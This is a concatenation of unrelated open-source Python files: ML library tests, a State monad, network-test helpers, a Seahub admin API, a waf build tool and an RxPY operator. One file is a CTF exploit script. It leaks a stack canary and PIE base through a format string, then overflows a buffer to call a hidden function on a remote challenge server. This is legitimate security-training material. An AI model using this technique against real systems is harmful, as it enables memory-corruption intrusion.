num_neg = np.sum((sample < 0.0), axis=0, keepdims=True)
self.assertTrue((num_pos > 0).all())
self.assertTrue((num_neg > 0).all())
def test_args(self):
with self.test_session():
x = Normal(-100.0, 1.0)
y = ed.transform(x, bijectors.Softplus())
sample = y.sample(10).eval()
self.assertTrue((sample >= 0.0).all())
def test_kwargs(self):
with self.test_session():
x = Normal(-100.0, 1.0)
y = ed.transform(x, bijector=bijectors.Softplus())
sample = y.sample(10).eval()
self.assertTrue((sample >= 0.0).all())
def test_01(self):
with self.test_session():
x = Beta(1.0, 1.0)
y = ed.transform(x)
self.assertIsInstance(y, TransformedDistribution)
sample = y.sample(10, seed=1).eval()
self.assertSamplePosNeg(sample)
def test_nonnegative(self):
with self.test_session():
x = Gamma(1.0, 1.0)
y = ed.transform(x)
self.assertIsInstance(y, TransformedDistribution)
sample = y.sample(10, seed=1).eval()
self.assertSamplePosNeg(sample)
def test_simplex(self):
with self.test_session():
x = Dirichlet([1.1, 1.2, 1.3, 1.4])
y = ed.transform(x)
self.assertIsInstance(y, TransformedDistribution)
sample = y.sample(10, seed=1).eval()
self.assertSamplePosNeg(sample)
def test_real(self):
with self.test_session():
x = Normal(0.0, 1.0)
y = ed.transform(x)
self.assertIsInstance(y, Normal)
sample = y.sample(10, seed=1).eval()
self.assertSamplePosNeg(sample)
def test_multivariate_real(self):
with self.test_session():
x = MultivariateNormalDiag(tf.zeros(2), tf.ones(2))
y = ed.transform(x)
sample = y.sample(10, seed=1).eval()
self.assertSamplePosNeg(sample)
def test_no_support(self):
with self.test_session():
x = DirichletProcess(1.0, Normal(0.0, 1.0))
with self.assertRaises(AttributeError):
y = ed.transform(x)
def test_unhandled_support(self):
with self.test_session():
FakeRV = namedtuple('FakeRV', ['support'])
x = FakeRV(support='rational')
with self.assertRaises(ValueError):
y = ed.transform(x)
if __name__ == '__main__':
tf.test.main()
|
oslash/state.py | stjordanis/OSlash | 668 | 12797765 | <filename>oslash/state.py
from typing import Callable, Tuple, Any, TypeVar, Generic
from .util import Unit
from .typing import Functor
from .typing import Monad
TState = TypeVar("TState")
TSource = TypeVar("TSource")
TResult = TypeVar("TResult")
class State(Generic[TSource, TState]):
"""The state monad.
Wraps stateful computations. A stateful computation is a function
that takes a state and returns a result and new state:
state -> (result, state')
"""
def __init__(self, fn: Callable[[TState], Tuple[TSource, TState]]) -> None:
"""Initialize a new state.
Keyword arguments:
fn -- State processor.
"""
self._fn = fn
@classmethod
def unit(cls, value: TSource) -> "State[TSource, TState]":
r"""Create new State.
The unit function creates a new State object wrapping a stateful
computation.
State $ \s -> (x, s)
"""
return cls(lambda state: (value, state))
def map(self, mapper: Callable[[TSource], TResult]) -> "State[TResult, TState]":
def _(a: Any, state: Any) -> Tuple[Any, Any]:
return mapper(a), state
return State(lambda state: _(*self.run(state)))
def bind(self, fn: Callable[[TSource], "State[TState, TResult]"]) -> "State[TResult, TState]":
r"""m >>= k = State $ \s -> let (a, s') = runState m s
in runState (k a) s'
"""
def _(result: Any, state: Any) -> Tuple[Any, Any]:
return fn(result).run(state)
return State(lambda state: _(*self.run(state)))
@classmethod
def get(cls) -> "State[TState, TState]":
r"""get = state $ \s -> (s, s)"""
return State(lambda state: (state, state))
@classmethod
def put(cls, new_state: TState) -> "State[Tuple, TState]":
r"""put newState = state $ \s -> ((), newState)"""
return State(lambda state: (Unit, new_state))
def run(self, state: TState) -> Tuple[TSource, TState]:
"""Return wrapped state computation.
This is the inverse of unit and returns the wrapped function.
"""
return self._fn(state)
def __call__(self, state: Any) -> Tuple:
return self.run(state)
assert issubclass(State, Functor)
assert issubclass(State, Monad)
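# Illustrative usage sketch (the helper below is only an example, not part of
# the library): read the current state, bump it, and return the old value;
# run(41) threads the integer state through the composition and yields (41, 42).
def _counter_example() -> Tuple[int, int]:
    computation = State.get().bind(
        lambda n: State.put(n + 1).bind(
            lambda _: State.unit(n)))
    return computation.run(41)  # (old value, new state) == (41, 42)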
|
convlab/modules/nlu/multiwoz/error.py | ngduyanhece/ConvLab | 405 | 12797822 | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
"""
"""
class ErrorNLU:
"""Base model for generating NLU error."""
def __init__(self, act_type_rate=0.0, slot_rate=0.0):
"""
Args:
act_type_rate (float): The error rate applied on dialog act type.
slot_rate (float): Error rate applied on slots.
"""
self.set_error_rate(act_type_rate, slot_rate)
def set_error_rate(self, act_type_rate, slot_rate):
"""
Set error rate parameter for error model.
Args:
act_type_rate (float): The error rate applied on dialog act type.
slot_rate (float): Error rate applied on slots.
"""
self.act_type_rate = act_type_rate
self.slot_rate = slot_rate
def apply(self, dialog_act):
"""
Apply the error model on dialog act.
Args:
dialog_act (tuple): Dialog act.
Returns:
dialog_act (tuple): Dialog act with noise.
"""
#TODO
return
|
tests/scripts/thread-cert/pktverify/null_field.py | AdityaHPatwardhan/openthread | 2,962 | 12797842 | #!/usr/bin/env python3
#
# Copyright (c) 2019, The OpenThread Authors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
nullField = None
class NullField(object):
"""
    Represents a null field that does not exist.
"""
def __new__(cls, *args, **kwargs):
global nullField
if nullField is None:
nullField = object.__new__(cls, *args, **kwargs)
return nullField
def __init__(self):
assert self is nullField
def __bool__(self):
"""
NullField is always treated as False.
"""
return False
def __getattr__(self, item):
"""
Any sub field of the NullField is NullField itself.
"""
return self
def __setattr__(self, key, value):
pass
    def __len__(self) -> int:
return 0
def __eq__(self, other):
"""
        NullField is never equal to any other value.
"""
return False
def __ne__(self, other):
return True
def __lt__(self, other):
"""
        Comparing NullField to any other value yields False.
"""
return False
def __le__(self, other):
"""
        Comparing NullField to any other value yields False.
"""
return False
def __gt__(self, other):
"""
        Comparing NullField to any other value yields False.
"""
return False
def __ge__(self, other):
"""
        Comparing NullField to any other value yields False.
"""
return False
def __str__(self):
return "nullField"
def __repr__(self):
return 'nullField'
NullField()
if __name__ == '__main__':
assert nullField is NullField()
assert not nullField, repr(nullField)
assert nullField != nullField, repr(nullField)
assert nullField != 0
assert not (nullField > 1)
assert not (nullField < 1)
assert not (nullField < nullField)
assert not (nullField > nullField)
assert bool(nullField) is False
assert nullField != ""
assert nullField != None # noqa
assert nullField is not None
|
mmrotate/core/bbox/iou_calculators/builder.py | williamcorsel/mmrotate | 449 | 12797885 | # Copyright (c) OpenMMLab. All rights reserved.
from mmcv.utils import build_from_cfg
from mmdet.core.bbox.iou_calculators.builder import IOU_CALCULATORS
ROTATED_IOU_CALCULATORS = IOU_CALCULATORS
def build_iou_calculator(cfg, default_args=None):
"""Builder of IoU calculator."""
return build_from_cfg(cfg, ROTATED_IOU_CALCULATORS, default_args)
|
tests/converter/test_url2netloc.py | Centaurioun/PyFunceble | 213 | 12797888 | """
The tool to check the availability or syntax of domain, IP or URL.
::
██████╗ ██╗ ██╗███████╗██╗ ██╗███╗ ██╗ ██████╗███████╗██████╗ ██╗ ███████╗
██╔══██╗╚██╗ ██╔╝██╔════╝██║ ██║████╗ ██║██╔════╝██╔════╝██╔══██╗██║ ██╔════╝
██████╔╝ ╚████╔╝ █████╗ ██║ ██║██╔██╗ ██║██║ █████╗ ██████╔╝██║ █████╗
██╔═══╝ ╚██╔╝ ██╔══╝ ██║ ██║██║╚██╗██║██║ ██╔══╝ ██╔══██╗██║ ██╔══╝
██║ ██║ ██║ ╚██████╔╝██║ ╚████║╚██████╗███████╗██████╔╝███████╗███████╗
╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═════╝╚══════╝╚═════╝ ╚══════╝╚══════╝
Tests of URL 2 Network Location converter.
Author:
<NAME>, @funilrys, contactTATAfunilrysTODTODcom
Special thanks:
https://pyfunceble.github.io/special-thanks.html
Contributors:
https://pyfunceble.github.io/contributors.html
Project link:
https://github.com/funilrys/PyFunceble
Project documentation:
https://pyfunceble.readthedocs.io/en/dev/
Project homepage:
https://pyfunceble.github.io/
License:
::
Copyright 2017, 2018, 2019, 2020, 2021 <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest
import unittest.mock
from PyFunceble.converter.url2netloc import Url2Netloc
class TestUrl2Netloc(unittest.TestCase):
"""
Tests our internal URL converter.
"""
def setUp(self) -> None:
"""
Setups everything needed for the tests.
"""
self.converter = Url2Netloc()
def tearDown(self) -> None:
"""
Destroys everything previously created for the tests.
"""
del self.converter
def test_set_data_to_convert_no_string(self) -> None:
"""
        Tests the method which lets us set the data to work with for the case
that a non-string value is given.
"""
given = ["Hello", "World"]
self.assertRaises(TypeError, lambda: self.converter.set_data_to_convert(given))
def test_set_data_to_convert_empty_string(self) -> None:
"""
        Tests the method which lets us set the data to work with for the case
that an empty-string value is given.
"""
given = ""
self.assertRaises(ValueError, lambda: self.converter.set_data_to_convert(given))
def test_get_converted_nothing_to_decode(self) -> None:
"""
        Tests the method which lets us extract the netloc from a given URL for
the case that no conversion is needed.
"""
given = "example.org"
expected = "example.org"
self.converter.data_to_convert = given
actual = self.converter.get_converted()
self.assertEqual(expected, actual)
def test_get_converted_full_url(self) -> None:
"""
        Tests the method which lets us extract the netloc from a given URL for
the case that a full URL is given.
"""
given = "https://example.org/hello/world/this/is/a/test"
expected = "example.org"
self.converter.data_to_convert = given
actual = self.converter.get_converted()
self.assertEqual(expected, actual)
def test_get_converted_full_url_with_port(self) -> None:
"""
        Tests the method which lets us extract the netloc from a given URL for
the case that a full URL (with explicit port) is given.
"""
given = "https://example.org:8080/hello/world/this/is/a/test"
expected = "example.org:8080"
self.converter.data_to_convert = given
actual = self.converter.get_converted()
self.assertEqual(expected, actual)
def test_get_converted_full_url_with_params(self) -> None:
"""
        Tests the method which lets us extract the netloc from a given URL for
the case that a full URL (with params) is given.
"""
given = "https://example.org/?is_admin=true"
expected = "example.org"
self.converter.data_to_convert = given
actual = self.converter.get_converted()
self.assertEqual(expected, actual)
def test_get_converted_url_without_scheme(self) -> None:
"""
        Tests the method which lets us extract the netloc from a given URL for
the case that no scheme is given.
"""
given = "example.org/hello/world/this/is/a/test"
expected = "example.org"
self.converter.data_to_convert = given
actual = self.converter.get_converted()
self.assertEqual(expected, actual)
def test_get_converted_url_without_scheme_and_with_params(self) -> None:
"""
        Tests the method which lets us extract the netloc from a given URL for
the case that no scheme (but with params) is given.
"""
given = "example.org/?is_admin=true"
expected = "example.org"
self.converter.data_to_convert = given
actual = self.converter.get_converted()
self.assertEqual(expected, actual)
def test_get_converted_url_without_protocol(self) -> None:
"""
        Tests the method which lets us extract the netloc from a given URL for
the case that no protocol is given.
"""
given = "://example.org/hello/world/this/is/a/test"
expected = "example.org"
self.converter.data_to_convert = given
actual = self.converter.get_converted()
self.assertEqual(expected, actual)
def test_get_converted_url_without_protocol_and_with_params(self) -> None:
"""
        Tests the method which lets us extract the netloc from a given URL for
the case that no protocol (but params) is given.
"""
given = "://example.org/?is_admin=true"
expected = "example.org"
self.converter.data_to_convert = given
actual = self.converter.get_converted()
self.assertEqual(expected, actual)
def test_get_converted_url_without_protocol_and_path(self) -> None:
"""
        Tests the method which lets us extract the netloc from a given URL for
the case that no protocol and path is given.
"""
given = "://example.org/"
expected = "example.org"
self.converter.data_to_convert = given
actual = self.converter.get_converted()
self.assertEqual(expected, actual)
def test_get_converted_url_startswith_2_slashes(self) -> None:
"""
        Tests the method which lets us extract the netloc from a given URL for
the case that the given url starts with 2 slashes.
"""
given = "//example.org/hello/world/this/is/a/test"
expected = "example.org"
self.converter.data_to_convert = given
actual = self.converter.get_converted()
self.assertEqual(expected, actual)
def test_get_converted_url_startswith_1_slash(self) -> None:
"""
        Tests the method which lets us extract the netloc from a given URL for
the case that the given url starts with 1 slash.
"""
given = "/example.org/hello/world/this/is/a/test"
expected = ""
self.converter.data_to_convert = given
actual = self.converter.get_converted()
self.assertEqual(expected, actual)
if __name__ == "__main__":
unittest.main()
|
nemo/collections/common/losses/aggregator.py | hamjam/NeMo | 4,145 | 12797934 | # Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import List
import torch
from nemo.core.classes import Loss, typecheck
from nemo.core.neural_types import LossType, NeuralType
__all__ = ['AggregatorLoss']
class AggregatorLoss(Loss):
"""
Sums several losses into one.
Args:
num_inputs: number of input losses
weights: a list of coefficient for merging losses
"""
@property
def input_types(self):
"""Returns definitions of module input ports.
"""
input_types = {}
for i in range(self._num_losses):
input_types["loss_" + str(i + 1)] = NeuralType(elements_type=LossType())
return input_types
@property
def output_types(self):
"""Returns definitions of module output ports.
"""
return {"loss": NeuralType(elements_type=LossType())}
def __init__(self, num_inputs: int = 2, weights: List[float] = None):
super().__init__()
self._num_losses = num_inputs
if weights is not None and len(weights) != num_inputs:
raise ValueError("Length of weights should be equal to the number of inputs (num_inputs)")
self._weights = weights
@typecheck()
def forward(self, **kwargs):
values = [kwargs[x] for x in sorted(kwargs.keys())]
loss = torch.zeros_like(values[0])
for loss_idx, loss_value in enumerate(values):
if self._weights is not None:
loss = loss.add(loss_value, alpha=self._weights[loss_idx])
else:
loss = loss.add(loss_value)
return loss
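# Example of the aggregation semantics implemented above: with num_inputs=2 and
# weights=[0.7, 0.3], forward(loss_1=a, loss_2=b) evaluates to 0.7 * a + 0.3 * b;
# with weights=None it reduces to the plain sum a + b.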
|
tensorflow/contrib/distributions/python/kernel_tests/estimator_test.py | tianyapiaozi/tensorflow | 848 | 12797975 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for estimator.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import six
from tensorflow.contrib.distributions.python.ops import estimator as estimator_lib
from tensorflow.contrib.learn.python.learn.estimators import constants
from tensorflow.contrib.learn.python.learn.estimators import head as head_lib
from tensorflow.contrib.learn.python.learn.estimators import model_fn
from tensorflow.contrib.learn.python.learn.estimators.head_test import _assert_metrics
from tensorflow.contrib.learn.python.learn.estimators.head_test import _assert_no_variables
from tensorflow.contrib.learn.python.learn.estimators.head_test import _assert_summary_tags
from tensorflow.python.client import session
from tensorflow.python.framework import ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops.distributions import normal as normal_lib
from tensorflow.python.platform import test
class EstimatorHeadDistributionRegressionTest(test.TestCase):
def _assert_output_alternatives(self, model_fn_ops):
self.assertEquals({
None: constants.ProblemType.LINEAR_REGRESSION
}, {
k: v[0] for k, v in six.iteritems(model_fn_ops.output_alternatives)
})
def testNormalLocScaleLogits(self):
# We will bias logits[..., 1] so that: logits[..., 1]=0 implies scale=1.
scale_bias = np.log(np.expm1(1.))
def softplus(x):
return np.log1p(np.exp(x))
def actual_loss(logits, labels):
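      # Reference value: the closed-form negative log-likelihood of a Normal,
      # -log N(x | mu, sigma) = 0.5 * ((x - mu)^2 / sigma^2 + log(2 * pi)) + log(sigma),
      # averaged over the batch.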
mu = actual_mean(logits)
sigma = actual_stddev(logits)
labels = np.squeeze(labels, -1)
z = (labels - mu) / sigma
loss = 0.5 * (z**2. + np.log(2. * np.pi)) + np.log(sigma)
return loss.mean()
def actual_mean(logits):
return logits[..., 0]
def actual_stddev(logits):
return softplus(logits[..., 1] + scale_bias)
def make_distribution_fn(logits):
return normal_lib.Normal(
loc=logits[..., 0],
scale=nn_ops.softplus(logits[..., 1] + scale_bias))
head = estimator_lib.estimator_head_distribution_regression(
make_distribution_fn,
logits_dimension=2)
labels = np.float32([[-1.],
[0.],
[1.]])
logits = np.float32([[0., -1],
[1, 0.5],
[-1, 1]])
with ops.Graph().as_default(), session.Session():
# Convert to tensor so we can index into head.distributions.
tflogits = ops.convert_to_tensor(logits, name="logits")
model_fn_ops = head.create_model_fn_ops(
{},
labels=labels,
mode=model_fn.ModeKeys.TRAIN,
train_op_fn=head_lib.no_op_train_fn,
logits=tflogits)
self._assert_output_alternatives(model_fn_ops)
_assert_summary_tags(self, ["loss"])
_assert_no_variables(self)
loss = actual_loss(logits, labels)
_assert_metrics(self, loss, {"loss": loss}, model_fn_ops)
# Now we verify the underlying distribution was correctly constructed.
expected_mean = logits[..., 0]
self.assertAllClose(
expected_mean,
head.distribution(tflogits).mean().eval(),
rtol=1e-6, atol=0.)
expected_stddev = softplus(logits[..., 1] + scale_bias)
self.assertAllClose(
expected_stddev,
head.distribution(tflogits).stddev().eval(),
rtol=1e-6, atol=0.)
# Should have created only one distribution.
self.assertEqual(1, len(head.distributions))
if __name__ == "__main__":
test.main()
|
seahub/organizations/api/users.py | samuelduann/seahub | 420 | 12797976 | # Copyright (c) 2012-2016 Seafile Ltd.
import logging
from rest_framework import status
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework.authentication import SessionAuthentication
from seaserv import ccnet_api
from seahub.api2.permissions import IsProVersion
from seahub.api2.throttling import UserRateThrottle
from seahub.api2.authentication import TokenAuthentication
from seahub.api2.utils import api_error
from seahub.api2.endpoints.utils import is_org_user
from seahub.utils import is_valid_email
from seahub.base.accounts import User
from seahub.base.templatetags.seahub_tags import email2nickname
from seahub.profile.models import Profile
logger = logging.getLogger(__name__)
def get_user_info(email):
profile = Profile.objects.get_profile_by_user(email)
info = {}
info['email'] = email
info['name'] = email2nickname(email)
info['contact_email'] = profile.contact_email if profile and profile.contact_email else ''
return info
class OrgAdminUser(APIView):
authentication_classes = (TokenAuthentication, SessionAuthentication)
throttle_classes = (UserRateThrottle,)
permission_classes = (IsProVersion,)
def put(self, request, org_id, email):
""" update name of an org user.
Permission checking:
1. only admin can perform this action.
"""
# resource check
org_id = int(org_id)
if not ccnet_api.get_org_by_id(org_id):
error_msg = 'Organization %s not found.' % org_id
return api_error(status.HTTP_404_NOT_FOUND, error_msg)
try:
user = User.objects.get(email=email)
except User.DoesNotExist:
error_msg = 'User %s not found.' % email
return api_error(status.HTTP_404_NOT_FOUND, error_msg)
# permission check
if not request.user.org.is_staff:
error_msg = 'Permission denied.'
return api_error(status.HTTP_403_FORBIDDEN, error_msg)
if request.user.org.org_id != org_id:
error_msg = 'Permission denied.'
return api_error(status.HTTP_403_FORBIDDEN, error_msg)
if not is_org_user(email, org_id):
error_msg = 'Permission denied.'
return api_error(status.HTTP_403_FORBIDDEN, error_msg)
# update user's name
name = request.data.get("name", None)
if name is not None:
name = name.strip()
if len(name) > 64:
error_msg = 'Name is too long (maximum is 64 characters).'
return api_error(status.HTTP_400_BAD_REQUEST, error_msg)
if "/" in name:
error_msg = "Name should not include '/'."
return api_error(status.HTTP_400_BAD_REQUEST, error_msg)
try:
Profile.objects.add_or_update(email, nickname=name)
except Exception as e:
logger.error(e)
error_msg = 'Internal Server Error'
return api_error(status.HTTP_500_INTERNAL_SERVER_ERROR, error_msg)
# update user's contact email
contact_email = request.data.get("contact_email", None)
if contact_email is not None:
contact_email = contact_email.strip()
if contact_email != '' and not is_valid_email(contact_email):
error_msg = 'contact_email invalid.'
return api_error(status.HTTP_400_BAD_REQUEST, error_msg)
try:
Profile.objects.add_or_update(email, contact_email=contact_email)
except Exception as e:
logger.error(e)
error_msg = 'Internal Server Error'
return api_error(status.HTTP_500_INTERNAL_SERVER_ERROR, error_msg)
info = get_user_info(email)
info['is_active'] = user.is_active
return Response(info)
|
tests/modules/transformer/bimodal_attention_test.py | MSLars/allennlp | 11,433 | 12797992 | <gh_stars>1000+
import torch
import pytest
from allennlp.common import Params
from allennlp.modules.transformer import BiModalAttention
@pytest.fixture
def params_dict():
return {
"hidden_size1": 6,
"hidden_size2": 4,
"combined_hidden_size": 16,
"num_attention_heads": 2,
"dropout1": 0.1,
"dropout2": 0.2,
}
@pytest.fixture
def params(params_dict):
return Params(params_dict)
@pytest.fixture
def biattention(params):
return BiModalAttention.from_params(params.duplicate())
def test_can_construct_from_params(biattention, params_dict):
assert biattention.num_attention_heads == params_dict["num_attention_heads"]
assert biattention.attention_head_size == int(
params_dict["combined_hidden_size"] / params_dict["num_attention_heads"]
)
assert (
biattention.all_head_size
== params_dict["num_attention_heads"] * biattention.attention_head_size
)
assert biattention.query1.in_features == params_dict["hidden_size1"]
assert biattention.key1.in_features == params_dict["hidden_size1"]
assert biattention.value1.in_features == params_dict["hidden_size1"]
assert biattention.dropout1.p == params_dict["dropout1"]
assert biattention.query2.in_features == params_dict["hidden_size2"]
assert biattention.key2.in_features == params_dict["hidden_size2"]
assert biattention.value2.in_features == params_dict["hidden_size2"]
assert biattention.dropout2.p == params_dict["dropout2"]
def test_forward_runs(biattention):
biattention(
torch.randn(2, 3, 6),
torch.randn(2, 3, 4),
torch.randint(0, 2, (2, 2, 3, 3)) == 1, # creating boolean tensors
torch.randint(0, 2, (2, 2, 3, 3)) == 1,
)
|
src/third_party/angle/third_party/glmark2/src/waflib/Tools/dmd.py | goochen/naiveproxy | 2,151 | 12798000 | <reponame>goochen/naiveproxy
#! /usr/bin/env python
# encoding: utf-8
# WARNING! Do not edit! https://waf.io/book/index.html#_obtaining_the_waf_file
import sys
from waflib.Tools import ar,d
from waflib.Configure import conf
@conf
def find_dmd(conf):
conf.find_program(['dmd','dmd2','ldc'],var='D')
out=conf.cmd_and_log(conf.env.D+['--help'])
if out.find("D Compiler v")==-1:
out=conf.cmd_and_log(conf.env.D+['-version'])
if out.find("based on DMD v1.")==-1:
conf.fatal("detected compiler is not dmd/ldc")
@conf
def common_flags_ldc(conf):
v=conf.env
v.DFLAGS=['-d-version=Posix']
v.LINKFLAGS=[]
v.DFLAGS_dshlib=['-relocation-model=pic']
@conf
def common_flags_dmd(conf):
v=conf.env
v.D_SRC_F=['-c']
v.D_TGT_F='-of%s'
v.D_LINKER=v.D
v.DLNK_SRC_F=''
v.DLNK_TGT_F='-of%s'
v.DINC_ST='-I%s'
v.DSHLIB_MARKER=v.DSTLIB_MARKER=''
v.DSTLIB_ST=v.DSHLIB_ST='-L-l%s'
v.DSTLIBPATH_ST=v.DLIBPATH_ST='-L-L%s'
v.LINKFLAGS_dprogram=['-quiet']
v.DFLAGS_dshlib=['-fPIC']
v.LINKFLAGS_dshlib=['-L-shared']
v.DHEADER_ext='.di'
v.DFLAGS_d_with_header=['-H','-Hf']
v.D_HDR_F='%s'
def configure(conf):
conf.find_dmd()
if sys.platform=='win32':
out=conf.cmd_and_log(conf.env.D+['--help'])
if out.find('D Compiler v2.')>-1:
conf.fatal('dmd2 on Windows is not supported, use gdc or ldc2 instead')
conf.load('ar')
conf.load('d')
conf.common_flags_dmd()
conf.d_platform_flags()
if str(conf.env.D).find('ldc')>-1:
conf.common_flags_ldc()
|
redteamvillage2021/pie/exploit.py | nhtri2003gmail/ctf-write-ups | 101 | 12798034 | <gh_stars>100-1000
#!/usr/bin/env python3
from pwn import *
binary = context.binary = ELF('./pie')
if args.REMOTE:
p = remote('pwnremote.threatsims.com', 9002)
else:
p = process(binary.path)
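# Stage 1: format-string leak. Stack offsets 11 and 15 (used below) are assumed
# to hold the stack canary and a saved return address into main() (main+95),
# which is enough to recover the PIE base and survive the canary check.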
p.sendlineafter('?\n','%11$10p%15$10p')
p.recvuntil('command: ')
canary = int(p.recv(10),16)
log.info('canary: ' + hex(canary))
main = int(p.recv(10),16) - 95
log.info('main: ' + hex(main))
binary.address = main - binary.sym.main
log.info('binary.address: ' + hex(binary.address))
payload = b''
payload += (0x21 - 0x10) * b'A'
payload += p32(canary)
payload += (0x21 - len(payload)) * b'B'
payload += p32(binary.sym.helperfunc)
p.sendlineafter('?',payload)
p.interactive()
|
generate/generate/tests/__init__.py | flamencist/browser-extensions | 102 | 12798042 | def dummy_config():
return {
'uuid': 'TEST-UUID',
'main': {
'server': 'https://test.forge.io/api/'
}
} |
vimfiles/bundle/vim-python/submodules/pylint/tests/functional/n/non/non_ascii_name.py | ciskoinch8/vimrc | 463 | 12798064 | """ Tests for non-ascii-name checker. """
áéíóú = 4444 # [non-ascii-name]
def úóíéá(): # [non-ascii-name]
"""yo"""
|
src/btt/questions/admin.py | kevinkissi/basic-tech-tips-webapp | 116 | 12798114 | <reponame>kevinkissi/basic-tech-tips-webapp
from django.contrib import admin
from django.apps import apps
questions = apps.get_app_config('questions')
for model_name, model in questions.models.items():
admin.site.register(model)
|
en/verbocean_to_json.py | yuichigoto/ccg2lambda | 200 | 12798116 | <filename>en/verbocean_to_json.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2017 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import argparse
from collections import defaultdict
import gzip
import json
parser = argparse.ArgumentParser()
parser.add_argument("infile")
parser.add_argument("outfile")
args = parser.parse_args()
def load_verbocean(verbocean_filename):
relations = dict()
    with gzip.open(verbocean_filename, 'rt', encoding='utf-8') as fin:
for line in fin:
if not line.startswith('#'):
verb1, rel, verb2 = line.split()[0:3]
if verb1 not in relations:
relations[verb1] = defaultdict(set)
relations[verb1][verb2].add(rel.strip('[]'))
return relations
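# Example: an input line such as "approach [happens-before] reach 10.0"
# (illustrative values) produces relations['approach']['reach'] ==
# {'happens-before'}; the sets are converted to plain lists below before
# being dumped to JSON.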
verbocean = load_verbocean(args.infile)
for v1, d in verbocean.items():
for v2, rels in d.items():
verbocean[v1][v2] = list(rels)
with open(args.outfile, 'w') as fout:
json.dump(verbocean, fout, indent=2)
|
rx/core/operators/catch.py | mmpio/RxPY | 4,342 | 12798120 | from typing import Callable, Union
import rx
from rx.core import Observable, typing
from rx.disposable import SingleAssignmentDisposable, SerialDisposable
from rx.internal.utils import is_future
def catch_handler(source: Observable, handler: Callable[[Exception, Observable], Observable]) -> Observable:
def subscribe(observer, scheduler=None):
d1 = SingleAssignmentDisposable()
subscription = SerialDisposable()
subscription.disposable = d1
def on_error(exception):
try:
result = handler(exception, source)
except Exception as ex: # By design. pylint: disable=W0703
observer.on_error(ex)
return
result = rx.from_future(result) if is_future(result) else result
d = SingleAssignmentDisposable()
subscription.disposable = d
d.disposable = result.subscribe(observer, scheduler=scheduler)
d1.disposable = source.subscribe_(
observer.on_next,
on_error,
observer.on_completed,
scheduler
)
return subscription
return Observable(subscribe)
def _catch(handler: Union[Observable, Callable[[Exception, Observable], Observable]]
) -> Callable[[Observable], Observable]:
def catch(source: Observable) -> Observable:
"""Continues an observable sequence that is terminated by an
exception with the next observable sequence.
Examples:
>>> op = catch(ys)
>>> op = catch(lambda ex, src: ys(ex))
Args:
handler: Second observable sequence used to produce
results when an error occurred in the first sequence, or an
exception handler function that returns an observable sequence
given the error and source observable that occurred in the
first sequence.
Returns:
An observable sequence containing the first sequence's
elements, followed by the elements of the handler sequence
in case an exception occurred.
"""
if callable(handler):
return catch_handler(source, handler)
elif isinstance(handler, typing.Observable):
return rx.catch(source, handler)
else:
raise TypeError('catch operator takes whether an Observable or a callable handler as argument.')
return catch
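# Usage sketch, assuming the RxPY 3.x public API where this operator is exposed
# as rx.operators.catch:
#
#   import rx
#   from rx import operators as ops
#
#   rx.throw(ValueError("boom")).pipe(
#       ops.catch(lambda ex, src: rx.of(42))
#   ).subscribe(print)   # emits 42 instead of propagating the error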
|
